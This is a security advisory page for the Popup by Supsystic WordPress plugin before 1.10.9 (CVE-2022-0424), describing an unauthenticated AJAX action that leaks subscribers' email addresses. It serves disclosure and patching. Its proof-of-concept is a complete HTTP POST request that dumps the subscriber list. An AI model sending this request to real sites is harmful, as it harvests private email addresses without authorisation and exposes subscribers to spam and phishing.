Lucene search
Felipe de AvilaWPVDB-ID:1E4593FD-51E5-43CA-A244-9AAEF3804B9FHistoryApr 18, 2022 - 12:00 a.m.
Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
2022-04-1800:00:00
Felipe de Avila
wpscan.com
17
popup plugin
supsystic
unauthenticated access
ajax
email disclosure
security issue
EPSS
0.015
Percentile
86.9%
The plugin does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 104 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close page=subscribe&action;=getListForTbl&reqType;=ajax&search;[text_like]=&_search=false&pl;=pps&sidx;=id&rows;=10
Related
prion
prion
Authentication flaw
2022-05-09 17:15:00
wpexploit
wpexploit
cve
cve
CVE-2022-0424
2022-05-09 17:15:08
cvelist
cvelist
nuclei
nuclei
Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
2024-04-10 19:54:34
nvd
nvd
CVE-2022-0424
2022-05-09 17:15:08
patchstack
patchstack